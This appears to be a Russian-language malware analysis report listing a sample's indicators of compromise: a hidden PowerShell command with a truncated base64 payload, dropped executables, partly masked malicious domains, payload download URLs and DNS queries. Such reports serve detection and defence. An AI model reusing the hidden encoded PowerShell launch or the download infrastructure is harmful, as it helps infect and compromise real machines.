Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAGIAeABnAGUAbgBiAHIAPQAnAE0AaQBrAHcAcABvAG4AbQBhACcAOwAkAFoAbwBzAHAAcgBnAHQAYgBuAG4AIAA9ACAAJwA2ADQAMwAnADsAJABUAG8AYQB3AGoAcgBuAG0AYwBiAD0AJwBXAGIAYgBsAGEAdQBoAGQAYwB0ACcAOwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1584
- %TEMP%\1192362.cvr
- %HOMEPATH%\643.exe
- 'no###kon.com':80
- 'co####rldinc.com':80
- 'fr#####cedigitales.com':80
- 'pu###itech.com':80
- http://no###kon.com/administrator/020/
- http://co####rldinc.com/browse/70676/
- http://fr#####cedigitales.com/keo/ekb98m90542/
- http://pu###itech.com/111/dtl227/
- DNS ASK fo####anderers.com
- DNS ASK no###kon.com
- DNS ASK co####rldinc.com
- DNS ASK fr#####cedigitales.com
- DNS ASK pu###itech.com